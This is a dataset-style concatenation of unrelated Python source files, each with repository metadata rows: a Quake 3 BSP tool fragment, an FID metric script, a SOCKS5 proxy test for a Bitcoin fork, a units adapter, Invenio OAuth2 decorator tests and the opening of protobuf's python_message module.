entities = Q3Entities()
textures = Q3Textures()
lightmaps = Q3Lightmaps()
if args.input_bsp_file:
bsp.readFile(args.input_bsp_file)
# TODO: must conflict with input_bsp_file
if args.input_bsp_dir:
bsp.readDir(args.input_bsp_dir)
if args.input_entities_file:
entities.readFile(args.input_entities_file)
bsp.importLump("entities", entities.exportLump())
if args.input_textures_file:
textures.readFile(args.input_textures_file)
bsp.importLump("textures", textures.exportLump())
if args.input_lightmaps_dir:
lightmaps.readDir(args.input_lightmaps_dir)
bsp.importLump("lightmaps", lightmaps.exportLump())
if args.strip_lightmaps:
# reset the lightmap lump
lightmaps = Q3Lightmaps()
bsp.importLump("lightmaps", lightmaps.exportLump())
if args.substitute_keywords:
substitution = Map.KeyValueSubstitution()
substitution.readFile(args.substitute_keywords)
bsp.substituteKeywords(substitution)
if args.lowercase_filepaths:
bsp.lowerCaseFilePaths()
entities.importLump(bsp.exportLump("entities"))
textures.importLump(bsp.exportLump("textures"))
lightmaps.importLump(bsp.exportLump("lightmaps"))
if args.output_bsp_file:
bsp.writeFile(args.output_bsp_file)
if args.output_bsp_dir:
bsp.writeDir(args.output_bsp_dir)
if args.output_entities_file:
if not entities.isEmpty():
entities.writeFile(args.output_entities_file)
else:
Ui.error("Entities lump missing")
if args.output_textures_file:
if not textures.isEmpty():
textures.writeFile(args.output_textures_file)
else:
Ui.error("Textures lump missing")
if args.output_lightmaps_dir:
lightmaps.writeDir(args.output_lightmaps_dir)
if args.list_all:
args.list_lumps = True
if not entities.isEmpty():
args.list_entities = True
args.list_sounds = True
if not textures.isEmpty():
args.list_textures = True
if not lightmaps.isEmpty():
args.list_lightmaps = True
if args.list_lumps:
bsp.printLumpList()
if args.list_entities:
if not entities.isEmpty():
entities.printList()
else:
Ui.error("Entities lump missing")
if args.list_textures:
if not textures.isEmpty():
textures.printList()
else:
Ui.error("Textures lump missing")
if args.list_lightmaps:
if not lightmaps.isEmpty():
lightmaps.printList()
else:
Ui.error("Lightmaps lump missing")
if args.list_sounds:
if not entities.isEmpty():
entities.printSoundList()
else:
Ui.error("Entities lump missing")
if args.print_entities:
if not entities.isEmpty():
entities.printString()
else:
Ui.error("Entities lump missing")
if __name__ == "__main__":
main()
| 30.280172 | 171 | 0.707616 |
4fa55b586a53d43d9286ac94aa4bcd43d38c4008 | 9,757 | py | Python | cGAN/fid/fid_score.py | youngleox/gmu | 0ab963976098ce7861c462ddae136ac92edd9916 | [
"MIT"
] | null | null | null | cGAN/fid/fid_score.py | youngleox/gmu | 0ab963976098ce7861c462ddae136ac92edd9916 | [
"MIT"
] | null | null | null | cGAN/fid/fid_score.py | youngleox/gmu | 0ab963976098ce7861c462ddae136ac92edd9916 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Calculates the Frechet Inception Distance (FID) to evalulate GANs
The FID metric calculates the distance between two distributions of images.
Typically, we have summary statistics (mean & covariance matrix) of one
of these distributions, while the 2nd distribution is given by a GAN.
When run as a stand-alone program, it compares the distribution of
images that are stored as PNG/JPEG at a specified location with a
distribution given by summary statistics (in pickle format).
The FID is calculated by assuming that X_1 and X_2 are the activations of
the pool_3 layer of the inception net for generated samples and real world
samples respectively.
See --help to see further details.
Code apapted from https://github.com/bioinf-jku/TTUR to use PyTorch instead
of Tensorflow
Copyright 2018 Institute of Bioinformatics, JKU Linz
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import pathlib
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import numpy as np
import torch
from scipy import linalg
from torch.nn.functional import adaptive_avg_pool2d
from PIL import Image
try:
from tqdm import tqdm
except ImportError:
# If not tqdm is not available, provide a mock version of it
def tqdm(x): return x
from fid.inception import InceptionV3
parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('path', type=str, nargs=2,
help=('Path to the generated images or '
'to .npz statistic files'))
parser.add_argument('--batch-size', type=int, default=50,
help='Batch size to use')
parser.add_argument('--dims', type=int, default=2048,
choices=list(InceptionV3.BLOCK_INDEX_BY_DIM),
help=('Dimensionality of Inception features to use. '
'By default, uses pool3 features'))
parser.add_argument('-c', '--gpu', default='', type=str,
help='GPU to use (leave blank for CPU only)')
def imread(filename):
"""
Loads an image file into a (height, width, 3) uint8 ndarray.
"""
return np.asarray(Image.open(filename), dtype=np.uint8)[..., :3]
def get_activations(files, model, batch_size=50, dims=2048,
cuda=False, verbose=False):
"""Calculates the activations of the pool_3 layer for all images.
Params:
-- files : List of image files paths
-- model : Instance of inception model
-- batch_size : Batch size of images for the model to process at once.
Make sure that the number of samples is a multiple of
the batch size, otherwise some samples are ignored. This
behavior is retained to match the original FID score
implementation.
-- dims : Dimensionality of features returned by Inception
-- cuda : If set to True, use GPU
-- verbose : If set to True and parameter out_step is given, the number
of calculated batches is reported.
Returns:
-- A numpy array of dimension (num images, dims) that contains the
activations of the given tensor when feeding inception with the
query tensor.
"""
model.eval()
if batch_size > len(files):
print(('Warning: batch size is bigger than the data size. '
'Setting batch size to data size'))
batch_size = len(files)
pred_arr = np.empty((len(files), dims))
for i in tqdm(range(0, len(files), batch_size)):
if verbose:
print('\rPropagating batch %d/%d' % (i + 1, n_batches),
end='', flush=True)
start = i
end = i + batch_size
images = np.array([imread(str(f)).astype(np.float32)
for f in files[start:end]])
# Reshape to (n_images, 3, height, width)
images = images.transpose((0, 3, 1, 2))
images /= 255
batch = torch.from_numpy(images).type(torch.FloatTensor)
if cuda:
batch = batch.cuda()
pred = model(batch)[0]
# If model output is not scalar, apply global spatial average pooling.
# This happens if you choose a dimensionality not equal 2048.
if pred.size(2) != 1 or pred.size(3) != 1:
pred = adaptive_avg_pool2d(pred, output_size=(1, 1))
pred_arr[start:end] = pred.cpu().data.numpy().reshape(pred.size(0), -1)
if verbose:
print(' done')
return pred_arr
def calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=1e-6):
"""Numpy implementation of the Frechet Distance.
The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1)
and X_2 ~ N(mu_2, C_2) is
d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)).
Stable version by Dougal J. Sutherland.
Params:
-- mu1 : Numpy array containing the activations of a layer of the
inception net (like returned by the function 'get_predictions')
for generated samples.
-- mu2 : The sample mean over activations, precalculated on an
representative data set.
-- sigma1: The covariance matrix over activations for generated samples.
-- sigma2: The covariance matrix over activations, precalculated on an
representative data set.
Returns:
-- : The Frechet Distance.
"""
mu1 = np.atleast_1d(mu1)
mu2 = np.atleast_1d(mu2)
sigma1 = np.atleast_2d(sigma1)
sigma2 = np.atleast_2d(sigma2)
assert mu1.shape == mu2.shape, \
'Training and test mean vectors have different lengths'
assert sigma1.shape == sigma2.shape, \
'Training and test covariances have different dimensions'
diff = mu1 - mu2
# Product might be almost singular
covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False)
if not np.isfinite(covmean).all():
msg = ('fid calculation produces singular product; '
'adding %s to diagonal of cov estimates') % eps
print(msg)
offset = np.eye(sigma1.shape[0]) * eps
covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset))
# Numerical error might give slight imaginary component
if np.iscomplexobj(covmean):
if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3):
m = np.max(np.abs(covmean.imag))
raise ValueError('Imaginary component {}'.format(m))
covmean = covmean.real
tr_covmean = np.trace(covmean)
return (diff.dot(diff) + np.trace(sigma1) +
np.trace(sigma2) - 2 * tr_covmean)
def calculate_activation_statistics(files, model, batch_size=50,
dims=2048, cuda=False, verbose=False):
"""Calculation of the statistics used by the FID.
Params:
-- files : List of image files paths
-- model : Instance of inception model
-- batch_size : The images numpy array is split into batches with
batch size batch_size. A reasonable batch size
depends on the hardware.
-- dims : Dimensionality of features returned by Inception
-- cuda : If set to True, use GPU
-- verbose : If set to True and parameter out_step is given, the
number of calculated batches is reported.
Returns:
-- mu : The mean over samples of the activations of the pool_3 layer of
the inception model.
-- sigma : The covariance matrix of the activations of the pool_3 layer of
the inception model.
"""
act = get_activations(files, model, batch_size, dims, cuda, verbose)
mu = np.mean(act, axis=0)
sigma = np.cov(act, rowvar=False)
return mu, sigma
def _compute_statistics_of_path(path, model, batch_size, dims, cuda):
if path.endswith('.npz'):
f = np.load(path)
m, s = f['mu'][:], f['sigma'][:]
f.close()
else:
path = pathlib.Path(path)
files = list(path.glob('*.jpg')) + list(path.glob('*.png'))
m, s = calculate_activation_statistics(files, model, batch_size,
dims, cuda)
return m, s
def calculate_fid_given_paths(paths, batch_size, cuda, dims):
"""Calculates the FID of two paths"""
for p in paths:
if not os.path.exists(p):
raise RuntimeError('Invalid path: %s' % p)
block_idx = InceptionV3.BLOCK_INDEX_BY_DIM[dims]
model = InceptionV3([block_idx])
if cuda:
model.cuda()
m1, s1 = _compute_statistics_of_path(paths[0], model, batch_size,
dims, cuda)
m2, s2 = _compute_statistics_of_path(paths[1], model, batch_size,
dims, cuda)
fid_value = calculate_frechet_distance(m1, s1, m2, s2)
return fid_value
if __name__ == '__main__':
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
fid_value = calculate_fid_given_paths(args.path,
args.batch_size,
args.gpu != '',
args.dims)
print('FID: ', fid_value)
| 36.958333 | 79 | 0.631547 |
f6a55cfd624929913c5f642c96f4adf56a07c38e | 6,106 | py | Python | qa/rpc-tests/proxy_test.py | wealthsilo/WealthSilo | 318df3155e8ede3e2c34fd4b02bf4a7ee8d53e65 | [
"MIT"
] | null | null | null | qa/rpc-tests/proxy_test.py | wealthsilo/WealthSilo | 318df3155e8ede3e2c34fd4b02bf4a7ee8d53e65 | [
"MIT"
] | null | null | null | qa/rpc-tests/proxy_test.py | wealthsilo/WealthSilo | 318df3155e8ede3e2c34fd4b02bf4a7ee8d53e65 | [
"MIT"
] | 1 | 2018-08-10T23:57:27.000Z | 2018-08-10T23:57:27.000Z | #!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import socket
import traceback, sys
from binascii import hexlify
import time, os
from socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType
from test_framework import BitcoinTestFramework
from util import *
'''
Test plan:
- Start bitcoind's with different proxy configurations
- Use addnode to initiate connections
- Verify that proxies are connected to, and the right connection command is given
- Proxy configurations to test on bitcoind side:
- `-proxy` (proxy everything)
- `-onion` (proxy just onions)
- `-proxyrandomize` Circuit randomization
- Proxy configurations to test on proxy side,
- support no authentication (other proxy)
- support no authentication + user/pass authentication (Tor)
- proxy on IPv6
- Create various proxies (as threads)
- Create bitcoinds that connect to them
- Manipulate the bitcoinds using addnode (onetry) an observe effects
addnode connect to IPv4
addnode connect to IPv6
addnode connect to onion
addnode connect to generic DNS name
'''
class ProxyTest(BitcoinTestFramework):
def __init__(self):
# Create two proxies on different ports
# ... one unauthenticated
self.conf1 = Socks5Configuration()
self.conf1.addr = ('127.0.0.1', 13000 + (os.getpid() % 1000))
self.conf1.unauth = True
self.conf1.auth = False
# ... one supporting authenticated and unauthenticated (Tor)
self.conf2 = Socks5Configuration()
self.conf2.addr = ('127.0.0.1', 14000 + (os.getpid() % 1000))
self.conf2.unauth = True
self.conf2.auth = True
# ... one on IPv6 with similar configuration
self.conf3 = Socks5Configuration()
self.conf3.af = socket.AF_INET6
self.conf3.addr = ('::1', 15000 + (os.getpid() % 1000))
self.conf3.unauth = True
self.conf3.auth = True
self.serv1 = Socks5Server(self.conf1)
self.serv1.start()
self.serv2 = Socks5Server(self.conf2)
self.serv2.start()
self.serv3 = Socks5Server(self.conf3)
self.serv3.start()
def setup_nodes(self):
# Note: proxies are not used to connect to local nodes
# this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost
return start_nodes(4, self.options.tmpdir, extra_args=[
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0']
])
def node_test(self, node, proxies, auth):
rv = []
# Test: outgoing IPv4 connection through node
node.addnode("15.61.23.23:1234", "onetry")
cmd = proxies[0].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "15.61.23.23")
assert_equal(cmd.port, 1234)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing IPv6 connection through node
node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry")
cmd = proxies[1].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "1233:3432:2434:2343:3234:2345:6546:4534")
assert_equal(cmd.port, 5443)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing onion connection through node
node.addnode("wealthsilovj7kcklujarx.onion:6520", "onetry")
cmd = proxies[2].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "wealthsilovj7kcklujarx.onion")
assert_equal(cmd.port, 6520)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing DNS name connection through node
node.addnode("node.noumenon:8333", "onetry")
cmd = proxies[3].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "node.noumenon")
assert_equal(cmd.port, 8333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
return rv
def run_test(self):
# basic -proxy
self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False)
# -proxy plus -onion
self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False)
# -proxy plus -onion, -proxyrandomize
rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True)
# Check that credentials as used for -proxyrandomize connections are unique
credentials = set((x.username,x.password) for x in rv)
assert_equal(len(credentials), 4)
# proxy on IPv6 localhost
self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False)
if __name__ == '__main__':
ProxyTest().main()
| 41.821918 | 145 | 0.653456 |
1197c6e086f1809a25a9f2b8aaf11d9ec00a9158 | 1,154 | py | Python | codetools/contexts/adapter/unit_corrector_adapter.py | braidedlogix/Codetools_wxPhoenix_py3 | 555e7e3e4895ef9d79716e0323db4445436d10dc | [
"BSD-3-Clause"
] | 1 | 2017-05-12T04:17:50.000Z | 2017-05-12T04:17:50.000Z | codetools/contexts/adapter/unit_corrector_adapter.py | braidedlogix/Codetools_wxPhoenix_py3 | 555e7e3e4895ef9d79716e0323db4445436d10dc | [
"BSD-3-Clause"
] | null | null | null | codetools/contexts/adapter/unit_corrector_adapter.py | braidedlogix/Codetools_wxPhoenix_py3 | 555e7e3e4895ef9d79716e0323db4445436d10dc | [
"BSD-3-Clause"
] | null | null | null | #
# (C) Copyright 2013 Enthought, Inc., Austin, TX
# All right reserved.
#
# This file is open source software distributed according to the terms in
# LICENSE.txt
#
# ETS library imports
from scimath.units.api import UnitArray
from traits.api import Dict
# Local imports
from .unit_manipulation_adapter import UnitManipulationAdapter
from .unit_converter_functions import unit_array_units_overwriter
unit_corrector_converters = {UnitArray: unit_array_units_overwriter}
class UnitCorrectorAdapter(UnitManipulationAdapter):
""" Overwrite units on an object with a new set of units. The new units
are found based on the name for the object in the context.
Note: This is an extremely thin wrapper around UnitManipulationAdapter.
It only overrides the default settings for converters.
fixme: We may want to modify converters so that they don't overwrite
compatible units with new units. We may only want to correct
untis that are completely screwed up...
"""
# override with a set of converters that add units to objects
converters = Dict(unit_corrector_converters)
| 34.969697 | 79 | 0.747834 |
e8bd92fd3641fad6d9666323bf38d8ccc7a3b89a | 8,088 | py | Python | tests/test_decorators.py | jrcastro2/invenio-oauth2server | f74bbe1ea19656831ac94946999100b65e6fe7dd | [
"MIT"
] | 3 | 2015-08-19T12:51:12.000Z | 2017-10-25T00:58:52.000Z | tests/test_decorators.py | jrcastro2/invenio-oauth2server | f74bbe1ea19656831ac94946999100b65e6fe7dd | [
"MIT"
] | 157 | 2015-08-04T12:14:23.000Z | 2021-06-02T14:59:10.000Z | tests/test_decorators.py | jrcastro2/invenio-oauth2server | f74bbe1ea19656831ac94946999100b65e6fe7dd | [
"MIT"
] | 44 | 2015-08-03T17:05:27.000Z | 2022-01-19T19:06:53.000Z | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""OAuth2Server decorators test cases."""
from datetime import datetime
from flask import url_for
from invenio_accounts.proxies import current_accounts
def test_require_api_auth_oauthlib_urldecode_issue(resource_fixture):
app = resource_fixture
with app.test_client() as client:
res = client.get(app.url_for_test1resource, query_string='q=k:v')
assert 401 == res.status_code
def test_require_api_auth_test1(resource_fixture):
app = resource_fixture
with app.test_client() as client:
res = client.get(app.url_for_test1resource)
assert 401 == res.status_code
assert 'Set-Cookie' not in res.headers
res = client.get(app.url_for_test1resource_token)
assert 200 == res.status_code
assert 'Set-Cookie' not in res.headers
def test_require_api_auth_test2(resource_fixture):
app = resource_fixture
with app.test_client() as client:
res = client.get(app.url_for_test2resource)
assert 401 == res.status_code
assert 'Set-Cookie' not in res.headers
res = client.get(app.url_for_test2resource_token)
assert 200 == res.status_code
assert 'Set-Cookie' not in res.headers
def test_require_oauth_scopes_test1(resource_fixture):
app = resource_fixture
with app.test_client() as client:
res = client.post(app.url_for_test1resource_token)
assert 200 == res.status_code
assert 'Set-Cookie' not in res.headers
res = client.post(app.url_for_test1resource_token_noscope)
assert 403 == res.status_code
assert 'Set-Cookie' not in res.headers
def test_require_oauth_scopes_test2(resource_fixture):
app = resource_fixture
with app.test_client() as client:
res = client.post(app.url_for_test2resource_token)
assert 200 == res.status_code
assert 'Set-Cookie' not in res.headers
res = client.post(app.url_for_test2resource_token_noscope)
assert 403 == res.status_code
assert 'Set-Cookie' not in res.headers
def test_require_oauth_scopes_allow_anonymous(resource_fixture):
app = resource_fixture
with app.test_client() as client:
res = client.get(app.url_for_test4resource)
assert 200 == res.status_code
assert b'None' == res.data
assert 'Set-Cookie' not in res.headers
res = client.get(app.url_for_test4resource_token)
assert 200 == res.status_code
assert u'{0}'.format(app.user_id).encode('utf-8') == res.data
assert 'Set-Cookie' not in res.headers
def test_rest_extension(resource_fixture):
app = resource_fixture
with app.test_client() as client:
res = client.post(app.url_for_test4resource)
assert 200 == res.status_code
assert b'None' == res.data
assert 'Set-Cookie' not in res.headers
res = client.post(app.url_for_test4resource_token)
assert 200 == res.status_code
assert u'{0}'.format(app.user_id).encode('utf-8') == res.data
assert 'Set-Cookie' not in res.headers
def test_access_login_required(resource_fixture):
app = resource_fixture
with app.test_client() as client:
# try to access to authentication required zone
res = client.post(app.url_for_test3resource)
assert 401 == res.status_code
assert 'Set-Cookie' not in res.headers
# try to access a scope protected zone (and pass)
res = client.post(app.url_for_test2resource_token)
assert 200 == res.status_code
# try to access to authentication required zone
res = client.post(app.url_for_test3resource)
assert 401 == res.status_code
assert 'Set-Cookie' not in res.headers
# try to access a scope protected zone (and fail)
res = client.post(app.url_for_test2resource_token_noscope)
assert 403 == res.status_code
assert 'Set-Cookie' not in res.headers
# try to access to login_required zone (and redirected to login)
res = client.post(app.url_for_test3resource)
assert 401 == res.status_code
assert 'Set-Cookie' not in res.headers
# login
res = client.post(url_for('security.login'), data=dict(
email='info@inveniosoftware.org',
password='tester'
))
assert 'Set-Cookie' in res.headers
# logout
res = client.get(url_for('security.logout'))
assert 302 == res.status_code
res = client.post(app.url_for_test2resource)
assert 401 == res.status_code
assert 'Set-Cookie' not in res.headers
# try to access to login_required zone (and pass)
res = client.post(app.url_for_test2resource_token)
assert 200 == res.status_code
assert 'Set-Cookie' not in res.headers
# try to access to login_required zone (and not pass)
res = client.post(app.url_for_test3resource)
assert 401 == res.status_code
assert 'Set-Cookie' not in res.headers
def test_jwt_client(resource_fixture, api_app):
"""Test client."""
app = resource_fixture
# Enable JWT
app.config['ACCOUNTS_JWT_ENABLE'] = True
with app.test_client() as client:
# Try to access to authentication required zone
res = client.post(app.url_for_test3resource)
assert 401 == res.status_code
# Login
res = client.post(url_for('security.login'), data=dict(
email='info@inveniosoftware.org',
password='tester'
))
assert 'Set-Cookie' in res.headers
# Try to access to without a JWT
res = client.post(app.url_for_test3resource)
assert 400 == res.status_code
# Generate a token
token = current_accounts.jwt_creation_factory()
# Make the request
res = client.post(
app.url_for_test3resource,
headers=[
('Authorization', 'Bearer {}'.format(token))
]
)
assert 200 == res.status_code
# Try with invalid user
token = current_accounts.jwt_creation_factory(user_id=-20)
# Make the request
res = client.post(
app.url_for_test3resource,
headers=[
('Authorization', 'Bearer {}'.format(token))
]
)
assert 403 == res.status_code
assert 'The JWT token is not valid.' in res.get_data(as_text=True)
# Try to access with expired token
extra = dict(
exp=datetime(1970, 1, 1),
)
# Create token
token = current_accounts.jwt_creation_factory(additional_data=extra)
# Make the request
res = client.post(
app.url_for_test3resource,
headers=[
('Authorization', 'Bearer {0}'.format(token))
]
)
assert 'The JWT token is expired.' in res.get_data(as_text=True)
# Not correct Schema
# Generate a token
token = current_accounts.jwt_creation_factory()
# Make the request
res = client.post(
app.url_for_test3resource,
headers=[
('Authorization', 'Avengers {}'.format(token))
]
)
assert 400 == res.status_code
assert 'Missing required header argument.' in res.get_data(
as_text=True)
# Check different header type
api_app.config['OAUTH2SERVER_JWT_AUTH_HEADER'] = 'X-Travis-Mark-XLII'
api_app.config['OAUTH2SERVER_JWT_AUTH_HEADER_TYPE'] = None
# Create token
token = current_accounts.jwt_creation_factory()
# Make the request
res = client.post(
app.url_for_test3resource,
headers=[
('X-Travis-Mark-XLII', '{0}'.format(token))
]
)
assert 200 == res.status_code
| 35.473684 | 77 | 0.64095 |
cb97cb2847f62660de92107b03cea21d59ec390f | 56,829 | py | Python | packager/third_party/protobuf/python/google/protobuf/internal/python_message.py | koln67/shaka-packager | 5b9fd409a5de502e8af2e46ee12840bd2226874d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 11,356 | 2017-12-08T19:42:32.000Z | 2022-03-31T16:55:25.000Z | packager/third_party/protobuf/python/google/protobuf/internal/python_message.py | koln67/shaka-packager | 5b9fd409a5de502e8af2e46ee12840bd2226874d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2,402 | 2017-12-08T22:31:01.000Z | 2022-03-28T19:25:52.000Z | packager/third_party/protobuf/python/google/protobuf/internal/python_message.py | koln67/shaka-packager | 5b9fd409a5de502e8af2e46ee12840bd2226874d | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1,343 | 2017-12-08T19:47:19.000Z | 2022-03-26T11:31:36.000Z | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# This code is meant to work on Python 2.4 and above only.
#
# TODO(robinson): Helpers for verbose, common checks like seeing if a
# descriptor's cpp_type is CPPTYPE_MESSAGE.
"""Contains a metaclass and helper functions used to create
protocol message classes from Descriptor objects at runtime.
Recall that a metaclass is the "type" of a class.
(A class is to a metaclass what an instance is to a class.)
In this case, we use the GeneratedProtocolMessageType metaclass
to inject all the useful functionality into the classes
output by the protocol compiler at compile-time.
The upshot of all this is that the real implementation
details for ALL pure-Python protocol buffers are *here in
this file*.
"""
__author__ = 'robinson@google.com (Will Robinson)'
from io import BytesIO
import struct
import sys
import weakref
import six
# We use "as" to avoid name collisions with variables.
from google.protobuf.internal import containers
from google.protobuf.internal import decoder
from google.protobuf.internal import encoder
from google.protobuf.internal import enum_type_wrapper
from google.protobuf.internal import message_listener as message_listener_mod
from google.protobuf.internal import type_checkers
from google.protobuf.internal import well_known_types
from google.protobuf.internal import wire_format
from google.protobuf import descriptor as descriptor_mod
from google.protobuf import message as message_mod
from google.protobuf import text_format
_FieldDescriptor = descriptor_mod.FieldDescriptor
_AnyFullTypeName = 'google.protobuf.Any'
class GeneratedProtocolMessageType(type):
"""Metaclass for protocol message classes created at runtime from Descriptors.
We add implementations for all methods described in the Message class. We
also create properties to allow getting/setting all fields in the protocol
message. Finally, we create slots to prevent users from accidentally
"setting" nonexistent fields in the protocol message, which then wouldn't get
serialized / deserialized properly.
The protocol compiler currently uses this metaclass to create protocol
message classes at runtime. Clients can also manually create their own
classes at runtime, as in this example:
mydescriptor = Descriptor(.....)
factory = symbol_database.Default()
factory.pool.AddDescriptor(mydescriptor)
MyProtoClass = factory.GetPrototype(mydescriptor)
myproto_instance = MyProtoClass()
myproto.foo_field = 23
...
"""
# Must be consistent with the protocol-compiler code in
# proto2/compiler/internal/generator.*.
_DESCRIPTOR_KEY = 'DESCRIPTOR'
def __new__(cls, name, bases, dictionary):
"""Custom allocation for runtime-generated class types.
We override __new__ because this is apparently the only place
where we can meaningfully set __slots__ on the class we're creating(?).
(The interplay between metaclasses and slots is not very well-documented).
Args:
name: Name of the class (ignored, but required by the
metaclass protocol).
bases: Base classes of the class we're constructing.
(Should be message.Message). We ignore this field, but
it's required by the metaclass protocol
dictionary: The class dictionary of the class we're
constructing. dictionary[_DESCRIPTOR_KEY] must contain
a Descriptor object describing this protocol message
type.
Returns:
Newly-allocated class.
"""
descriptor = dictionary[GeneratedProtocolMessageType._DESCRIPTOR_KEY]
if descriptor.full_name in well_known_types.WKTBASES:
bases += (well_known_types.WKTBASES[descriptor.full_name],)
_AddClassAttributesForNestedExtensions(descriptor, dictionary)
_AddSlots(descriptor, dictionary)
superclass = super(GeneratedProtocolMessageType, cls)
new_class = superclass.__new__(cls, name, bases, dictionary)
return new_class
def __init__(cls, name, bases, dictionary):
"""Here we perform the majority of our work on the class.
We add enum getters, an __init__ method, implementations
of all Message methods, and properties for all fields
in the protocol type.
Args:
name: Name of the class (ignored, but required by the
metaclass protocol).
bases: Base classes of the class we're constructing.
(Should be message.Message). We ignore this field, but
it's required by the metaclass protocol
dictionary: The class dictionary of the class we're
constructing. dictionary[_DESCRIPTOR_KEY] must contain
a Descriptor object describing this protocol message
type.
"""
descriptor = dictionary[GeneratedProtocolMessageType._DESCRIPTOR_KEY]
cls._decoders_by_tag = {}
if (descriptor.has_options and
descriptor.GetOptions().message_set_wire_format):
cls._decoders_by_tag[decoder.MESSAGE_SET_ITEM_TAG] = (
decoder.MessageSetItemDecoder(descriptor), None)
# Attach stuff to each FieldDescriptor for quick lookup later on.
for field in descriptor.fields:
_AttachFieldHelpers(cls, field)
descriptor._concrete_class = cls # pylint: disable=protected-access
_AddEnumValues(descriptor, cls)
_AddInitMethod(descriptor, cls)
_AddPropertiesForFields(descriptor, cls)
_AddPropertiesForExtensions(descriptor, cls)
_AddStaticMethods(cls)
_AddMessageMethods(descriptor, cls)
_AddPrivateHelperMethods(descriptor, cls)
superclass = super(GeneratedProtocolMessageType, cls)
superclass.__init__(name, bases, dictionary)
# Stateless helpers for GeneratedProtocolMessageType below.
# Outside clients should not access these directly.
#
# I opted not to make any of these methods on the metaclass, to make it more
